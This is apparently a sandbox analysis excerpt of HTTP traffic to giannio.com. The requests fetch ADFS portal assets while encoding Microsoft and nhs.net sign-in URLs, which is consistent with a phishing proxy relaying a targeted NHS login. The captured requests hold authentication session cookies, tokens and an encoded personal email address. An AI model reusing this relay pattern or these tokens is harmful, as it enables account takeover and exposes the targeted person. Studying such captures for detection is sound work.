https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmY2xpZW50LXJlcXVlc3QtaWQ9N2VhZGM3MTktYzRiYy1jN2MzLTYwMDMtODY5NzE1YWU0ZjU2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNDY4MDYyNTQ4ODUwOC5mZDBmOTE1ZC01Y2IwLTQ2MjYtOTI2My1mMGE5NDFkYmI2ZTQmc3RhdGU9RGN0QkRvTWdFRUJSYU1fUzd0QVJoM0ZZTkI3RkRFVUtpY1ZFVFhyOXNuaF85N1ZTNnQ3Y0dnMHRhcUtSSjR2RVFOWWhzd1B1VW9Ua0J4ZU5ld2N3U0phTXR6U2FCT0p4aUNIUWlycTl6MzdfU1Q5di02ZlVKWmQ2dlNRZVJlcFhqak1fRUdvLXU3cGVmdw==Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=hFN11MKGCHZs; qPdM.
Source: global traffic	HTTP traffic detected: GET /adfs/portal/css/style.css?id=33CE921C6722E586DEA10D344605F1331BBD100230AFE2CC69B7CFBD04556093 HTTP/1.1Host: giannio.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9mcy5uaHMubmV0L2FkZnMvbHMvP2xvZ2luX2hpbnQ9YWRyaWFubWFyc2glNDBuaHMubmV0JmNsaWVudC1yZXF1ZXN0LWlkPTdlYWRjNzE5LWM0YmMtYzdjMy02MDAzLTg2OTcxNWFlNGY1NiZ1c2VybmFtZT1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmd2E9d3NpZ25pbjEuMCZ3dHJlYWxtPXVybiUzYWZlZGVyYXRpb24lM2FNaWNyb3NvZnRPbmxpbmUmd2N0eD1lc3RzcmVkaXJlY3QlM2QyJTI2ZXN0c3JlcXVlc3QlM2RyUVFJQVJBQWpaRk5hTk5nQUliek5WMXM2OVF5RVJRRUpYb2FwTTFmazZhZ3VLN2RabWZYcmRuS1dwR1lmdm5TWkczemRVbjZ3OFk4aWlESThLRGdSZlE0VUdRWFpYZ1FGQWFEUWNfenN1UHdJTHJUVG1LTEYyXzZIbDZlMDN0NDNuR1NpM0dwNi15ZjhNeXdHZFkwT1FhaUlmMFZkeXdTdmJUNzVzSEhMNTkzNzVNUG4xOTRXeWh0Z1N1Vzc3ZThWRHlPMjM0RDQzb01tNllOVVF6aVpoeDM5ZmdIQVBvQUhBSHdOSEJlTjF4YmQ1cTY2MW0zSE11TE9jamZDc2lTa0pSNVVVcXlFcDhRazhrRW00eVpCbXNxWE1KZ0VyREtNcUxFUzR6Q1N3Smpzcm9pY2thMUtpSHhJSEN1TU5IMkxYNVkyTFhYMEhFZ2JHSzNxYld3NTc4Z240QU05Tk1abks5bHMtbWludGRVMlo4b1dzSlVlUzR0VDJXeVM3TTJMR1VYbDEzRmN5eE5rVXVxNU10d3VzYjYtdXBzTVNkMnNndHpaY3ZyenJlWDhHSTkzVU56cUF1N2FrN1AtMnVxbmk3a2V2Ymt6SUx0cmlwcmdxeXBpMHFIa2N5bFhNV1FPdW9DS3FMVzhzcEtYc3RPWTZZdHQ1RFozU0xfeV9JMlNRM1VOYkd6UjFLNGhSemI2QWZCWVJCOEM0NnlaQ29VaWtTSmk4UlY0aVFJWG84TURxR3ZWWS1fX255ZjIxWXVsMWR2UW1KdkpGNHJDd1g1ZGhFS3JsTjI3ZEtkSXB4cGVMeVRpYmNhYXR1c1ZCSjJkejVoSWxjb2VUZVVGTGRKZ1UySzJxSENJVEpLME9Ua1BIZEVnUjhVZUhTSzJBbl82OTMtYVhBd0trWW8yTkR0cGpjMnZrN2JodWJqT25MbzFEcmRhM29haEVQcTZJMDI4dWpVWFhxd1Q5X2IyTmo0ZElZNE9mdjQxNnVYUjhfMnY4LThpeEtIVWVJMzAjAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=hFN11MKGCHZs; qPdM.sig=kLeeELDLsoVcQ3j4mxqYtjIGLpY; ClientId=6D041578E8394D49BCAE840660191B27; OIDC=1; OpenIdConnect.nonce.v3.Wj9aGN8jRqQPBEpjiC9thrSpO5GWE7W0H04b1p4VQII=638724680625488508.fd0f915d-5cb0-4626-9263-f0a941dbb6e4; X-OWA-RedirectHistory=ArLym14BqGT3gbY03Qg; esctx-EYYo7bTJmw=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeJpAwmJuhY6fIh76LMdEGkXD34bp6Rut4iwBF6BX79VVNGev-TmPmsvtxXfMlTgzS9yZ9N831OCl95SJF6pO_XGa0SwajFb8hPgCPLygrVgDgMIdNTFJqYNhKjRuQIeOx0FTXALYZ1eMOWYAS94P1-CAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFegi7USDB8ft-k1JNq7kl52zenHxg0Yjwe9nUft6bN9IpDtp32I-F-IxUHU4T8KfGzDaBetLD8jeYB7_HP5FJ_AU6VJe_ewS5WXr-jB7hryNeCRQ4uw3EF7CyZXDM9HuAv9maF_z_B28F18RwyS7iBub8wrdshjzDCuiae8sKOnosgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=1.AU4AMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAABOAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEC9dXChY0b6LXDZ8fAIKs3mEgouST5ceJt6ZNLZTF4EV9b_bBGMoMMCQkZZ3wiabCp6uw6GJlWycqfxqr8tZvp9FNNWNewVXbZaC13OngHakgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrS
Source: global traffic	HTTP traffic detected: GET /adfs/portal/logo/logo.jpg?id=552AE255AE9C812ECF6AF2F3C0FDBD42503C77296588855C70A319F71FF4446F HTTP/1.1Host: giannio.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9mcy5uaHMubmV0L2FkZnMvbHMvP2xvZ2luX2hpbnQ9YWRyaWFubWFyc2glNDBuaHMubmV0JmNsaWVudC1yZXF1ZXN0LWlkPTdlYWRjNzE5LWM0YmMtYzdjMy02MDAzLTg2OTcxNWFlNGY1NiZ1c2VybmFtZT1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmd2E9d3NpZ25pbjEuMCZ3dHJlYWxtPXVybiUzYWZlZGVyYXRpb24lM2FNaWNyb3NvZnRPbmxpbmUmd2N0eD1lc3RzcmVkaXJlY3QlM2QyJTI2ZXN0c3JlcXVlc3QlM2RyUVFJQVJBQWpaRk5hTk5nQUliek5WMXM2OVF5RVJRRUpYb2FwTTFmazZhZ3VLN2RabWZYcmRuS1dwR1lmdm5TWkczemRVbjZ3OFk4aWlESThLRGdSZlE0VUdRWFpYZ1FGQWFEUWNfenN1UHdJTHJUVG1LTEYyXzZIbDZlMDN0NDNuR1NpM0dwNi15ZjhNeXdHZFkwT1FhaUlmMFZkeXdTdmJUNzVzSEhMNTkzNzVNUG4xOTRXeWh0Z1N1Vzc3ZThWRHlPMjM0RDQzb01tNllOVVF6aVpoeDM5ZmdIQVBvQUhBSHdOSEJlTjF4YmQ1cTY2MW0zSE11TE9jamZDc2lTa0pSNVVVcXlFcDhRazhrRW00eVpCbXNxWE1KZ0VyREtNcUxFUzR6Q1N3Smpzcm9pY2thMUtpSHhJSEN1TU5IMkxYNVkyTFhYMEhFZ2JHSzNxYld3NTc4Z240QU05Tk1abks5bHMtbWludGRVMlo4b1dzSlVlUzR0VDJXeVM3TTJMR1VYbDEzRmN5eE5rVXVxNU10d3VzYjYtdXBzTVNkMnNndHpaY3ZyenJlWDhHSTkzVU56cUF1N2FrN1AtMnVxbmk3a2V2Ymt6SUx0cmlwcmdxeXBpMHFIa2N5bFhNV1FPdW9DS3FMVzhzcEtYc3RPWTZZdHQ1RFozU0xfeV9JMlNRM1VOYkd6UjFLNGhSemI2QWZCWVJCOEM0NnlaQ29VaWtTSmk4UlY0aVFJWG84TURxR3ZWWS1fX255ZjIxWXVsMWR2UW1KdkpGNHJDd1g1ZGhFS3JsTjI3ZEtkSXB4cGVMeVRpYmNhYXR1c1ZCSjJkejVoSWxjb2VUZVVGTGRKZ1UySzJxSENJVEpLME9Ua1BIZEVnUjhVZUhTSzJBbl82OTMtYVhBd0trWW8yTkR0cGpjMnZrN2JodWJqT25MbzFEcmRhM29haEVQcTZJMDI4dWpVWFhxd1Q5X2IyTmo0ZElZNE9mdjQxNnVYUjhfMnY4LThpeEtIVWVJMzAjAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=hFN11MKGCHZs; qPdM.sig=kLeeELDLsoVcQ3j4mxqYtjIGLpY; ClientId=6D041578E8394D49BCAE840660191B27; OIDC=1; OpenIdConnect.nonce.v3.Wj9aGN8jRqQPBEpjiC9thrSpO5GWE7W0H04b1p4VQII=638724680625488508.fd0f915d-5cb0-4626-9263-f0a941dbb6e4; X-OWA-RedirectHistory=ArLym14BqGT3gbY03Qg; esctx-EYYo7bTJmw=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeJpAwmJuhY6fIh76LMdEGkXD34bp6Rut4iwBF6BX79VVNGev-TmPmsvtxXfMlTgzS9yZ9N831OCl95SJF6pO_XGa0SwajFb8hPgCPLygrVgDgMIdNTFJqYNhKjRuQIeOx0FTXALYZ1eMOWYAS94P1-CAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFegi7USDB8ft-k1JNq7kl52zenHxg0Yjwe9nUft6bN9IpDtp32I-F-IxUHU4T8KfGzDaBetLD8jeYB7_HP5FJ_AU6VJe_ewS5WXr-jB7hryNeCRQ4uw3EF7CyZXDM9HuAv9maF_z_B28F18RwyS7iBub8wrdshjzDCuiae8sKOnosgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=1.AU4AMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAABOAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEC9dXChY0b6LXDZ8fAIKs3mEgouST5ceJt6ZNLZTF4EV9b_bBGMoMMCQkZZ3wiabCp6uw6GJlWycqfxqr8tZvp9FNNWNewVXbZa
Source: global traffic	HTTP traffic detected: GET /adfs/portal/images/idp/idp.png?id=2AC2FFC878EA9FD5C7CA28D4A2C50FFC42C0562DBB8C70436EF326F4434ABA1E HTTP/1.1Host: giannio.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9mcy5uaHMubmV0L2FkZnMvbHMvP2xvZ2luX2hpbnQ9YWRyaWFubWFyc2glNDBuaHMubmV0JmNsaWVudC1yZXF1ZXN0LWlkPTdlYWRjNzE5LWM0YmMtYzdjMy02MDAzLTg2OTcxNWFlNGY1NiZ1c2VybmFtZT1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmd2E9d3NpZ25pbjEuMCZ3dHJlYWxtPXVybiUzYWZlZGVyYXRpb24lM2FNaWNyb3NvZnRPbmxpbmUmd2N0eD1lc3RzcmVkaXJlY3QlM2QyJTI2ZXN0c3JlcXVlc3QlM2RyUVFJQVJBQWpaRk5hTk5nQUliek5WMXM2OVF5RVJRRUpYb2FwTTFmazZhZ3VLN2RabWZYcmRuS1dwR1lmdm5TWkczemRVbjZ3OFk4aWlESThLRGdSZlE0VUdRWFpYZ1FGQWFEUWNfenN1UHdJTHJUVG1LTEYyXzZIbDZlMDN0NDNuR1NpM0dwNi15ZjhNeXdHZFkwT1FhaUlmMFZkeXdTdmJUNzVzSEhMNTkzNzVNUG4xOTRXeWh0Z1N1Vzc3ZThWRHlPMjM0RDQzb01tNllOVVF6aVpoeDM5ZmdIQVBvQUhBSHdOSEJlTjF4YmQ1cTY2MW0zSE11TE9jamZDc2lTa0pSNVVVcXlFcDhRazhrRW00eVpCbXNxWE1KZ0VyREtNcUxFUzR6Q1N3Smpzcm9pY2thMUtpSHhJSEN1TU5IMkxYNVkyTFhYMEhFZ2JHSzNxYld3NTc4Z240QU05Tk1abks5bHMtbWludGRVMlo4b1dzSlVlUzR0VDJXeVM3TTJMR1VYbDEzRmN5eE5rVXVxNU10d3VzYjYtdXBzTVNkMnNndHpaY3ZyenJlWDhHSTkzVU56cUF1N2FrN1AtMnVxbmk3a2V2Ymt6SUx0cmlwcmdxeXBpMHFIa2N5bFhNV1FPdW9DS3FMVzhzcEtYc3RPWTZZdHQ1RFozU0xfeV9JMlNRM1VOYkd6UjFLNGhSemI2QWZCWVJCOEM0NnlaQ29VaWtTSmk4UlY0aVFJWG84TURxR3ZWWS1fX255ZjIxWXVsMWR2UW1KdkpGNHJDd1g1ZGhFS3JsTjI3ZEtkSXB4cGVMeVRpYmNhYXR1c1ZCSjJkejVoSWxjb2VUZVVGTGRKZ1UySzJxSENJVEpLME9Ua1BIZEVnUjhVZUhTSzJBbl82OTMtYVhBd0trWW8yTkR0cGpjMnZrN2JodWJqT25MbzFEcmRhM29haEVQcTZJMDI4dWpVWFhxd1Q5X2IyTmo0ZElZNE9mdjQxNnVYUjhfMnY4LThpeEtIVWVJMzAjAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=hFN11MKGCHZs; qPdM.sig=kLeeELDLsoVcQ3j4mxqYtjIGLpY; ClientId=6D041578E8394D49BCAE840660191B27; OIDC=1; OpenIdConnect.nonce.v3.Wj9aGN8jRqQPBEpjiC9thrSpO5GWE7W0H04b1p4VQII=638724680625488508.fd0f915d-5cb0-4626-9263-f0a941dbb6e4; X-OWA-RedirectHistory=ArLym14BqGT3gbY03Qg; esctx-EYYo7bTJmw=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeJpAwmJuhY6fIh76LMdEGkXD34bp6Rut4iwBF6BX79VVNGev-TmPmsvtxXfMlTgzS9yZ9N831OCl95SJF6pO_XGa0SwajFb8hPgCPLygrVgDgMIdNTFJqYNhKjRuQIeOx0FTXALYZ1eMOWYAS94P1-CAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFegi7USDB8ft-k1JNq7kl52zenHxg0Yjwe9nUft6bN9IpDtp32I-F-IxUHU4T8KfGzDaBetLD8jeYB7_HP5FJ_AU6VJe_ewS5WXr-jB7hryNeCRQ4uw3EF7CyZXDM9HuAv9maF_z_B28F18RwyS7iBub8wrdshjzDCuiae8sKOnosgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=1.AU4AMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAABOAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEC9dXChY0b6LXDZ8fAIKs3mEgouST5ceJt6ZNLZTF4EV9b_bBGMoMMCQkZZ3wiabCp6uw6GJlWycqfxqr8tZvp9FNNWNew
Source: global traffic	HTTP traffic detected: GET /adfs/portal/logo/logo.jpg?id=552AE255AE9C812ECF6AF2F3C0FDBD42503C77296588855C70A319F71FF4446F HTTP/1.1Host: giannio.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=hFN11MKGCHZs; qPdM.sig=kLeeELDLsoVcQ3j4mxqYtjIGLpY; ClientId=6D041578E8394D49BCAE840660191B27; OIDC=1; OpenIdConnect.nonce.v3.Wj9aGN8jRqQPBEpjiC9thrSpO5GWE7W0H04b1p4VQII=638724680625488508.fd0f915d-5cb0-4626-9263-f0a941dbb6e4; X-OWA-RedirectHistory=ArLym14BqGT3gbY03Qg; esctx-EYYo7bTJmw=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeJpAwmJuhY6fIh76LMdEGkXD34bp6Rut4iwBF6BX79VVNGev-TmPmsvtxXfMlTgzS9yZ9N831OCl95SJF6pO_XGa0SwajFb8hPgCPLygrVgDgMIdNTFJqYNhKjRuQIeOx0FTXALYZ1eMOWYAS94P1-CAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFegi7USDB8ft-k1JNq7kl52zenHxg0Yjwe9nUft6bN9IpDtp32I-F-IxUHU4T8KfGzDaBetLD8jeYB7_HP5FJ_AU6VJe_ewS5WXr-jB7hryNeCRQ4uw3EF7CyZXDM9HuAv9maF_z_B28F18RwyS7iBub8wrdshjzDCuiae8sKOnosgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=1.AU4AMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAABOAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEC9dXChY0b6LXDZ8fAIKs3mEgouST5ceJt6ZNLZTF4EV9b_bBGMoMMCQkZZ3wiabCp6uw6GJlWycqfxqr8tZvp9FNNWNewVXbZaC13OngHakgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQECjnbUgKvoOMMEISkGrYRmxdtGdgyj_e6-qkoqKxHy4FVPFW_iMkoevHDDcgYSjld31gzVmbr5n-MbB24NVP6dtkLHycUwjpk_7Glra9ieMe6ZDP-OuyU79xaj8qVSrFUJpz69x1Hyhm1uaqgSRooC3f2AHbsCKFtOEF1qPcy19Wgs_hnhI-R1MWBdAbEkzwe-sii5zyt3HprDDxjlv5V9Oci2GQ15mqult0Y0BzMLZ-9mtgk4H0xfIO9Z2aZjVCEgUZH6tTqWmhvGE6RT6Wix10XnCL2eiQMEWO1azucPnwoOWqTnLXVhUL8PyvwNSdIyAnMY0rNDJ9XEr4sm3nCeARQfXJo3VysnFC-lMU2gGnyWRc2zlPTIU1wFh7ivLz6db1d48OtQiKF9KF9kVV_M_p8Ht3nE9SLCe6KU00_Cd7hEmA4fgO4UxT9GSfH71y6ZotAXpAyzgV5Khzglfoo3AJkeYJfoW3YkoJNaGBFKb9d0R1VB_G0BcIL-3tcI-_XIAA; fpc=Aigy6MsT76xAmzN3plwdK4eerOTJAQAAAGGEGN8OAAAA; cltm=CgAQABoAIgQIDBAF; ApplicationGatewayAffinityCORS=39e4756a814f076cf5aba74f6b1959ab; ApplicationGatewayAffinity=39e4756a814f076cf5aba74f6b1959ab
Source: global traffic	HTTP traffic detected: GET /adfs/portal/images/idp/idp.png?id=2AC2FFC878EA9FD5C7CA28D4A2C50FFC42C0562DBB8C70436EF326F4434ABA1E HTTP/1.1Host: giannio.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=hFN11MKGCHZs; qPdM.sig=kLeeELDLsoVcQ3j4mxqYtjIGLpY; ClientId=6D041578E8394D49BCAE840660191B27; OIDC=1; OpenIdConnect.nonce.v3.Wj9aGN8jRqQPBEpjiC9thrSpO5GWE7W0H04b1p4VQII=638724680625488508.fd0f915d-5cb0-4626-9263-f0a941dbb6e4; X-OWA-RedirectHistory=ArLym14BqGT3gbY03Qg; esctx-EYYo7bTJmw=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeJpAwmJuhY6fIh76LMdEGkXD34bp6Rut4iwBF6BX79VVNGev-TmPmsvtxXfMlTgzS9yZ9N831OCl95SJF6pO_XGa0SwajFb8hPgCPLygrVgDgMIdNTFJqYNhKjRuQIeOx0FTXALYZ1eMOWYAS94P1-CAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFegi7USDB8ft-k1JNq7kl52zenHxg0Yjwe9nUft6bN9IpDtp32I-F-IxUHU4T8KfGzDaBetLD8jeYB7_HP5FJ_AU6VJe_ewS5WXr-jB7hryNeCRQ4uw3EF7CyZXDM9HuAv9maF_z_B28F18RwyS7iBub8wrdshjzDCuiae8sKOnosgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=1.AU4AMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAABOAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEC9dXChY0b6LXDZ8fAIKs3mEgouST5ceJt6ZNLZTF4EV9b_bBGMoMMCQkZZ3wiabCp6uw6GJlWycqfxqr8tZvp9FNNWNewVXbZaC13OngHakgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQECjnbUgKvoOMMEISkGrYRmxdtGdgyj_e6-qkoqKxHy4FVPFW_iMkoevHDDcgYSjld31gzVmbr5n-MbB24NVP6dtkLHycUwjpk_7Glra9ieMe6ZDP-OuyU79xaj8qVSrFUJpz69x1Hyhm1uaqgSRooC3f2AHbsCKFtOEF1qPcy19Wgs_hnhI-R1MWBdAbEkzwe-sii5zyt3HprDDxjlv5V9Oci2GQ15mqult0Y0BzMLZ-9mtgk4H0xfIO9Z2aZjVCEgUZH6tTqWmhvGE6RT6Wix10XnCL2eiQMEWO1azucPnwoOWqTnLXVhUL8PyvwNSdIyAnMY0rNDJ9XEr4sm3nCeARQfXJo3VysnFC-lMU2gGnyWRc2zlPTIU1wFh7ivLz6db1d48OtQiKF9KF9kVV_M_p8Ht3nE9SLCe6KU00_Cd7hEmA4fgO4UxT9GSfH71y6ZotAXpAyzgV5Khzglfoo3AJkeYJfoW3YkoJNaGBFKb9d0R1VB_G0BcIL-3tcI-_XIAA; fpc=Aigy6MsT76xAmzN3plwdK4eerOTJAQAAAGGEGN8OAAAA; cltm=CgAQABoAIgQIDBAF; ApplicationGatewayAffinityCORS=3e4be02ce045059676cba5be06c6fab7; ApplicationGatewayAffinity=3e4be02ce045059676cba5be06c6fab7
Source: global traffic	HTTP traffic detected: GET /adfs/portal/illustration/illustration.png?id=7990E15053EC74EC6F6A7BAE796B821EE5A4BC17834D60F8E5591C33871A0F50 HTTP/1.1Host: giannio.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9mcy5uaHMubmV0L2FkZnMvbHMvP2xvZ2luX2hpbnQ9YWRyaWFubWFyc2glNDBuaHMubmV0JmNsaWVudC1yZXF1ZXN0LWlkPTdlYWRjNzE5LWM0YmMtYzdjMy02MDAzLTg2OTcxNWFlNGY1NiZ1c2VybmFtZT1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmd2E9d3NpZ25pbjEuMCZ3dHJlYWxtPXVybiUzYWZlZGVyYXRpb24lM2FNaWNyb3NvZnRPbmxpbmUmd2N0eD1lc3RzcmVkaXJlY3QlM2QyJTI2ZXN0c3JlcXVlc3QlM2RyUVFJQVJBQWpaRk5hTk5nQUliek5WMXM2OVF5RVJRRUpYb2FwTTFmazZhZ3VLN2RabWZYcmRuS1dwR1lmdm5TWkczemRVbjZ3OFk4aWlESThLRGdSZlE0VUdRWFpYZ1FGQWFEUWNfenN1UHdJTHJUVG1LTEYyXzZIbDZlMDN0NDNuR1NpM0dwNi15ZjhNeXdHZFkwT1FhaUlmMFZkeXdTdmJUNzVzSEhMNTkzNzVNUG4xOTRXeWh0Z1N1Vzc3ZThWRHlPMjM0RDQzb01tNllOVVF6aVpoeDM5ZmdIQVBvQUhBSHdOSEJlTjF4YmQ1cTY2MW0zSE11TE9jamZDc2lTa0pSNVVVcXlFcDhRazhrRW00eVpCbXNxWE1KZ0VyREtNcUxFUzR6Q1N3Smpzcm9pY2thMUtpSHhJSEN1TU5IMkxYNVkyTFhYMEhFZ2JHSzNxYld3NTc4Z240QU05Tk1abks5bHMtbWludGRVMlo4b1dzSlVlUzR0VDJXeVM3TTJMR1VYbDEzRmN5eE5rVXVxNU10d3VzYjYtdXBzTVNkMnNndHpaY3ZyenJlWDhHSTkzVU56cUF1N2FrN1AtMnVxbmk3a2V2Ymt6SUx0cmlwcmdxeXBpMHFIa2N5bFhNV1FPdW9DS3FMVzhzcEtYc3RPWTZZdHQ1RFozU0xfeV9JMlNRM1VOYkd6UjFLNGhSemI2QWZCWVJCOEM0NnlaQ29VaWtTSmk4UlY0aVFJWG84TURxR3ZWWS1fX255ZjIxWXVsMWR2UW1KdkpGNHJDd1g1ZGhFS3JsTjI3ZEtkSXB4cGVMeVRpYmNhYXR1c1ZCSjJkejVoSWxjb2VUZVVGTGRKZ1UySzJxSENJVEpLME9Ua1BIZEVnUjhVZUhTSzJBbl82OTMtYVhBd0trWW8yTkR0cGpjMnZrN2JodWJqT25MbzFEcmRhM29haEVQcTZJMDI4dWpVWFhxd1Q5X2IyTmo0ZElZNE9mdjQxNnVYUjhfMnY4LThpeEtIVWVJMzAjAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=hFN11MKGCHZs; qPdM.sig=kLeeELDLsoVcQ3j4mxqYtjIGLpY; ClientId=6D041578E8394D49BCAE840660191B27; OIDC=1; OpenIdConnect.nonce.v3.Wj9aGN8jRqQPBEpjiC9thrSpO5GWE7W0H04b1p4VQII=638724680625488508.fd0f915d-5cb0-4626-9263-f0a941dbb6e4; X-OWA-RedirectHistory=ArLym14BqGT3gbY03Qg; esctx-EYYo7bTJmw=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeJpAwmJuhY6fIh76LMdEGkXD34bp6Rut4iwBF6BX79VVNGev-TmPmsvtxXfMlTgzS9yZ9N831OCl95SJF6pO_XGa0SwajFb8hPgCPLygrVgDgMIdNTFJqYNhKjRuQIeOx0FTXALYZ1eMOWYAS94P1-CAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFegi7USDB8ft-k1JNq7kl52zenHxg0Yjwe9nUft6bN9IpDtp32I-F-IxUHU4T8KfGzDaBetLD8jeYB7_HP5FJ_AU6VJe_ewS5WXr-jB7hryNeCRQ4uw3EF7CyZXDM9HuAv9maF_z_B28F18RwyS7iBub8wrdshjzDCuiae8sKOnosgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=1.AU4AMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAABOAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEC9dXChY0b6LXDZ8fAIKs3mEgouST5ceJt6ZNLZTF4EV9b_bBGMoMMCQkZZ3wiabCp6uw6GJlWycqfxqr8t
